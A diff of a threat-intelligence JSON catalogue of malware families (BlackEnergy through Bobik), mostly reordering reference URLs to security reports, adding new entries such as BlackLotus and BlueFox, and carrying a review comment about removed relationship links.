- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html",
+ "https://marcusedmondson.com/2019/01/18/black-energy-analysis/",
+ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
"https://www.secureworks.com/research/blackenergy2",
- "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
"https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/",
- "https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection"
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf",
+ "https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5a22cad7-65fa-4b7a-a7aa-7915a6101efa",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "82c644ab-550a-4a83-9b35-d545f4719069",
"value": "BlackEnergy"
},
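Review bot: as with Biscuit, the BlackEnergy `related` array (the `similar` link to dest-uuid 5a22cad7-65fa-4b7a-a7aa-7915a6101efa) is deleted with no replacement, so the patch removes relationship data alongside the refs reshuffle. Either restore the block or document where these relationships now live. Among the added refs, the two `cocomelonc.github.io/tutorial/.../malware-pers-*.html` entries look from their URLs like general tutorial pages rather than BlackEnergy analyses; worth confirming they really come from the upstream Malpedia library for this family and are not a matching artefact.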
@@ -14735,21 +15649,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackguard",
- "https://blog.cyble.com/2022/04/01/dissecting-blackguard-info-stealer/",
- "https://www.techtimes.com/articles/273752/20220331/new-password-stealing-malware-hacking-forum-hack-password-stealing-google-chrome-binance-outlook-telegram.htm",
- "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
- "https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data",
- "https://www.youtube.com/watch?v=Fd8WjxzY2_g",
- "https://thehackernews.com/2022/04/experts-shed-light-on-blackguard.html",
- "https://www.zdnet.com/article/meet-blackguard-a-new-infostealer-peddled-on-russian-hacker-forums/",
"https://blogs.blackberry.com/en/2022/04/threat-thursday-blackguard-infostealer",
- "https://www.bleepingcomputer.com/news/security/new-blackguard-password-stealing-malware-sold-on-hacker-forums/",
- "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
- "https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5",
- "https://medium.com/s2wblog/the-history-of-blackguard-stealer-86207e72ffb4",
- "https://cyberint.com/blog/research/blackguard-stealer/",
"https://ke-la.com/information-stealers-a-new-landscape/",
- "https://www.zscaler.com/blogs/security-research/analysis-blackguard-new-info-stealer-malware-being-sold-russian-hacking"
+ "https://www.zdnet.com/article/meet-blackguard-a-new-infostealer-peddled-on-russian-hacker-forums/",
+ "https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5",
+ "https://thehackernews.com/2022/04/experts-shed-light-on-blackguard.html",
+ "https://www.zscaler.com/blogs/security-research/analysis-blackguard-new-info-stealer-malware-being-sold-russian-hacking",
+ "https://blog.cyble.com/2022/04/01/dissecting-blackguard-info-stealer/",
+ "https://www.bleepingcomputer.com/news/security/new-blackguard-password-stealing-malware-sold-on-hacker-forums/",
+ "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
+ "https://www.youtube.com/watch?v=Fd8WjxzY2_g",
+ "https://cyberint.com/blog/research/blackguard-stealer/",
+ "https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data",
+ "https://medium.com/s2wblog/the-history-of-blackguard-stealer-86207e72ffb4",
+ "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
+ "https://www.techtimes.com/articles/273752/20220331/new-password-stealing-malware-hacking-forum-hack-password-stealing-google-chrome-binance-outlook-telegram.htm"
],
"synonyms": [],
"type": []
@@ -14762,11 +15676,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackkingdom_ransomware",
- "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html",
- "https://news.sophos.com/en-us/2021/03/23/black-kingdom/",
- "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html",
"https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://news.sophos.com/en-us/2021/03/23/black-kingdom/",
+ "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html",
"https://securelist.com/black-kingdom-ransomware/102873/",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
],
@@ -14776,65 +15690,94 @@
"uuid": "246b6563-edd8-49c7-9d3c-97dc1aec6b81",
"value": "BlackKingdom Ransomware"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacklotus",
+ "https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/",
+ "https://www.binarly.io/posts/The_Untold_Story_of_the_BlackLotus_UEFI_Bootkit/index.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6d542c85-cf94-466f-97a2-eac3c50fbea2",
+ "value": "BlackLotus"
+ },
+ {
+ "description": "Ransomware",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmagic",
+ "https://blog.cyble.com/2022/12/07/a-closer-look-at-blackmagic-ransomware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "80735865-325c-4829-a6df-22e5d84735e6",
+ "value": "BlackMagic"
+ },
{
"description": "Ransomware-as-a-Service ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter",
- "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
- "https://blog.group-ib.com/blackmatter#",
- "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809",
- "https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
- "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
- "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.glimps.fr/lockbit3-0/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/",
- "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html",
- "https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf",
- "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.mandiant.com/resources/cryptography-blackmatter-ransomware",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
"https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
- "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
- "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
- "https://www.netskope.com/blog/netskope-threat-coverage-blackmatter",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
- "https://www.youtube.com/watch?v=NIiEcOryLpI",
- "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
"https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/",
- "https://twitter.com/GelosSnake/status/1451465959894667275",
- "https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809",
+ "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/",
"https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
- "https://blog.minerva-labs.com/blackmatter",
+ "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html",
+ "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-291a",
+ "https://www.mandiant.com/resources/cryptography-blackmatter-ransomware",
+ "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
"https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
"https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/",
- "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
"https://www.varonis.com/blog/blackmatter-ransomware/",
"https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-291a",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
+ "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
+ "https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://twitter.com/GelosSnake/status/1451465959894667275",
+ "https://blog.group-ib.com/blackmatter#",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.glimps.fr/lockbit3-0/",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration",
"https://blog.group-ib.com/blackmatter2",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ "https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.netskope.com/blog/netskope-threat-coverage-blackmatter",
+ "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/",
+ "https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf",
+ "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/",
+ "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps",
+ "https://blog.minerva-labs.com/blackmatter",
+ "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
],
"synonyms": [],
"type": []
@@ -14847,13 +15790,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat",
- "https://labs.k7computing.com/?p=21365",
- "https://github.com/FarisCode511/BlackNET/",
- "https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/",
- "https://github.com/BlackHacker511/BlackNET/",
"http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html",
"https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware",
- "https://github.com/mave12/BlackNET-3.7.0.1"
+ "https://labs.k7computing.com/?p=21365",
+ "https://github.com/BlackHacker511/BlackNET/",
+ "https://github.com/mave12/BlackNET-3.7.0.1",
+ "https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/",
+ "https://github.com/FarisCode511/BlackNET/"
],
"synonyms": [],
"type": []
@@ -14879,10 +15822,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/",
- "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf"
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/"
],
"synonyms": [
"Kaptoxa",
@@ -14900,9 +15843,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackremote",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
"https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/",
- "https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/",
- "https://news.sophos.com/en-us/2020/05/14/raticate/"
+ "https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/"
],
"synonyms": [
"BlackRAT"
@@ -14945,8 +15888,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby",
- "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/",
- "https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware"
+ "https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware",
+ "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/"
],
"synonyms": [],
"type": []
@@ -14959,27 +15902,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades",
- "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
"https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/",
- "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/",
+ "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
"https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/",
- "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html"
+ "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/",
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "8c3202d5-1671-46ec-9d42-cb50dbe2f667",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b",
"value": "BlackShades"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksnake",
+ "https://blog.cyble.com/2023/03/09/blacksnake-ransomware-emerges-from-chaos-ransomwares-shadow/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "366fe903-5ab4-47d3-a0e0-8ff45b2b4a8c",
+ "value": "BlackSnake"
+ },
{
"description": "",
"meta": {
@@ -14998,8 +15945,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackworm_rat",
- "https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-malware-team-uses-blackworm-for-attacks.html",
"https://github.com/BlackHacker511/BlackWorm",
+ "https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-malware-team-uses-blackworm-for-attacks.html",
"https://www.fidelissecurity.com/threatgeek/archive/down-h-w0rm-hole-houdinis-rat/"
],
"synonyms": [],
@@ -15026,13 +15973,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan",
- "https://www.hvs-consulting.de/lazarus-report/",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
"https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
"https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
+ "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/",
"https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a"
+ "https://www.hvs-consulting.de/lazarus-report/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [
"DRATzarus RAT"
@@ -15048,8 +15997,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blindtoad",
"https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/",
- "https://content.fireeye.com/apt/rpt-apt38",
- "https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html"
+ "https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html",
+ "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf",
+ "https://content.fireeye.com/apt/rpt-apt38"
],
"synonyms": [],
"type": []
@@ -15062,20 +16012,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blister",
- "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://elastic.github.io/security-research/malware/2022/05/02.blister/article/",
- "https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign",
"https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://twitter.com/MsftSecIntel/status/1522690116979855360",
"https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
+ "https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign",
+ "https://redcanary.com/blog/intelligence-insights-january-2022/",
+ "https://twitter.com/MsftSecIntel/status/1522690116979855360",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://elastic.github.io/security-research/malware/2022/05/02.blister/article/",
"https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-2/",
"https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-1/",
- "https://redcanary.com/blog/intelligence-insights-january-2022/"
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [
"COLORFAKE"
@@ -15099,13 +16049,42 @@
"uuid": "ecdc0a43-8845-4dc4-a3f0-de2f0142aa4d",
"value": "BloodyStealer"
},
+ {
+ "description": "BlueFox is a .NET infostealer sold on forums as a Maware-as-a-Service. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, and file grabber and loader capabilities.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluefox",
+ "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/",
+ "https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f9f5d767-3460-49f3-94c2-5dd91b341505",
+ "value": "BlueFox"
+ },
+ {
+ "description": "Mandiant associates this with UNC4191, this malware is a launcher for NCAT to establish a reverse tunnel.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluehaze",
+ "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3dcfef7b-d657-4ac5-b738-ef793237274b",
+ "value": "BLUEHAZE"
+ },
{
"description": "Ransomware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bluesky",
"https://unit42.paloaltonetworks.com/bluesky-ransomware/",
- "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/"
+ "https://yoroi.company/research/dissecting-bluesky-ransomware-payload/",
+ "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/",
+ "https://cloudsek.com/technical-analysis-of-bluesky-ransomware/"
],
"synonyms": [],
"type": []
@@ -15118,8 +16097,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bluether",
- "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
- "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf"
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
+ "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf"
],
"synonyms": [
"CAPGELD"
@@ -15134,12 +16113,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blustealer",
- "https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs",
"https://twitter.com/GoSecure_Inc/status/1437435265350397957",
- "https://blogs.blackberry.com/en/2021/10/threat-thursday-blustealer-infostealer",
- "https://decoded.avast.io/anhho/blustealer/",
"https://www.gosecure.net/blog/2021/09/22/gosecure-titan-labs-technical-report-blustealer-malware-threat/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord"
+ "https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://decoded.avast.io/anhho/blustealer/",
+ "https://blogs.blackberry.com/en/2021/10/threat-thursday-blustealer-infostealer"
],
"synonyms": [
"a310logger"
@@ -15180,6 +16159,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bobik",
+ "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/",
"https://decoded.avast.io/martinchlumecky/bobik/"
],
"synonyms": [],
@@ -15200,6 +16180,20 @@
"uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b",
